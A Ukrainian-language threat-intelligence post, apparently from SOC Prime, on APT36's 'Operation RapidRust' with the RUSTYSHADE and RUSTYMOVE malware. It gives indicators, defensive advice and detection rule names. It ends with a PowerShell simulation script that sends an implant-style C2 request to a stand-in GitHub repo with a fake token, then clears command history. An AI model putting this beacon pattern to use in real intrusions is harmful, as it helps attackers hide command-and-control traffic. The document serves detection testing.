SOC Prime Bias: Critical

17 Sep 2026 20:33 UTC

APT36 запускає Операцію ШвидкаІржа з RUSTYSHADE та RUSTYMOVE

Author Photo
SOC Prime Team linkedin icon Стежити
APT36 запускає Операцію ШвидкаІржа з RUSTYSHADE та RUSTYMOVE
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Загроза APT36, пов’язана з Пакистаном, веде кампанію, відому як Operation RapidRust проти урядових і оборонних організацій. Група представила нове шкідливе програмне забезпечення на базі Rust, включаючи бекдор RUSTYSHADE та інструмент поширення RUSTYMOVE. APT36 також використовує спеціалізовані скрипти для крадіжки файлів, PSNATCH і BASHNATCH, щоб збирати та ексфільтрувати дані через приватні репозиторії GitHub.

Розслідування

Zscaler ThreatLabz ідентифікувала нові родини шкідливого ПЗ та інструменти після компрометації, які використовує APT36 у серпні 2026 року. Розслідування виявило, що RUSTYSHADE зловживає GitHub REST API для командного управління і використовує кібершахрайські домени для інсталяції навантаження. Дослідники також спостерігали спроби бічного переміщення та поширення RUSTYMOVE через знімні медіа для досягнення ізольованих середовищ.

Заходи захисту

Організаціям слід контролювати несанкціоноване використання GitHub API та незвичайні вихідні з’єднання з хмарними службами зберігання, такими як Backblaze. Слід встановити суворий контроль на знімні медіа, водночас підозрілі заплановані завдання, що імітують легітимні оновлення, повинні бути виявлені. Контроль кінцевих точок повинен також виявляти несанкціоноване виконання скриптів PowerShell чи Bash та незвичайну активність ексфільтрації файлів.

Відповідь

Якщо виявлено зловмисну ​​активність, слід негайно ізолювати уражені кінцеві точки Windows і Linux, щоб запобігти боковому переміщенню та ексфільтрації даних. Відповідальні службовці повинні перевірити заплановані завдання та шукати файли, такі як DriverInstaller.zip or Automata-20.exe. Журнали мережі також слід переглянути для з’єднань з theprints[.]org, indiatodays[.]org, та підозрілу активність GitHub API, що походить з середовища.

Потік атак

Ми ще оновлюємо цю частину.

Виявлення

Можливість виконання прихованих рядків команд PowerShell (через cmdline)

Команда SOC Prime
17 вересня 2026

Завантаження або вивантаження через Powershell (через cmdline)

Команда SOC Prime
17 вересня 2026

Можливе виявлення віддаленої системи або перевірка підключення (через cmdline)

Команда SOC Prime
17 вересня 2026

Можливе виявлення мережевих ресурсів (через cmdline)

Команда SOC Prime
17 вересня 2026

Можлива енумерація адміністративного облікового запису або групи (через cmdline)

Команда SOC Prime
17 вересня 2026

Можливе виявлення мережевої конфігурації системи (через cmdline)

Команда SOC Prime
17 вересня 2026

Підозріле виконання з публічного профілю користувача (через process_creation)

Команда SOC Prime
17 вересня 2026

Можливе створення запланованого завдання (через powershell)

Команда SOC Prime
17 вересня 2026

Можливі спроби комунікації домену пошуку IP (через dns)

Команда SOC Prime
17 вересня 2026

IOC (HashSha256) для виявлення: Operation RapidRust: APT36 розгортає RUSTYSHADE, RUSTYMOVE, PSNATCH і BASHNATCH

Правила SOC Prime AI
17 вересня 2026

IOC (HashSha1) для виявлення: Operation RapidRust: APT36 розгортає RUSTYSHADE, RUSTYMOVE, PSNATCH і BASHNATCH

Правила SOC Prime AI
17 вересня 2026

IOC (HashMd5) для виявлення: Operation RapidRust: APT36 розгортає RUSTYSHADE, RUSTYMOVE, PSNATCH і BASHNATCH

Правила SOC Prime AI
17 вересня 2026

Комунікація C2 RUSTYSHADE через GitHub API [Підключення до мережі Windows]

Правила SOC Prime AI
17 вересня 2026

Виявлення активності RUSTYSHADE та RUSTYMOVE через PowerShell [PowerShell для Windows]

Правила SOC Prime AI
17 вересня 2026

Виконання симуляції

  • Опис атаки та команди: Противник успішно розгорнув імплант, схожий на RUSTYSHADE, на робочій станції Windows. Щоб отримати подальші інструкції, імплант повинен зв’язатися зі своїм центром командування та управління (C2), розміщеним на GitHub. Імплант спробує звернутися до певного репозиторію, щоб отримати навантаження. Щоб обійти базові фільтри периметру, які можуть блокувати анонімний доступ API, імплант використовує хардкодований Персональний Токен Доступу (PAT), переданий через Authorization: token <TOKEN> заголовок. Ця дія спрямована на створення враження, що це інструмент розробника, який легітимно отримує метадані репозиторію, але специфічне поєднання URL-адреси репозиторію та токен префікс у заголовку спровокує правило виявлення.

  • Сценарій регресійного тестування:

    # Сценарій симуляції для імітації C2 комунікації RUSTYSHADE
    # Цей сценарій генерує запит, що збігається з логікою виявлення:
    # 1. URL містить 'api.github.com/repos/'
    # 2. Заголовок містить 'Authorization: token'
    
    $targetUrl = "https://api.github.com/repos/adversary-c2/malicious-repo/contents/config.json"
    $fakeToken = "ghp_sImUlAtEdToKeN1234567890AbCdEfGhIjKlMnOpQrStUvWxYz"
    
    # Конструювання заголовка, щоб відповідати точному рядку 'token', необхідному для правила
    $headers = @{
        "Authorization" = "token $fakeToken"
        "User-Agent"    = "RUSTYSHADE-Implant/1.0"
    }
    
    Write-Host "Спроба комунікації C2 з $targetUrl..."
    try {
        # Використовуємо -ErrorAction SilentlyContinue, так як URL підроблений і поверне 404, 
        # але проксі все одно зафіксує спробу запиту.
        Invoke-WebRequest -Uri $targetUrl -Headers $headers -Method Get -ErrorAction SilentlyContinue
        Write-Host "Симуляційний запит успішно надіслано."
    } catch {
        Write-Host "Запит надіслано (Очікувана помилка через фейковий URL, але проксі-журнали повинні зафіксувати спробу)."
    }
  • Команди очищення:

    # Постійні зміни в систему не були внесені; 
    # проте ми очищаємо історію команд для чистоти.
    Clear-History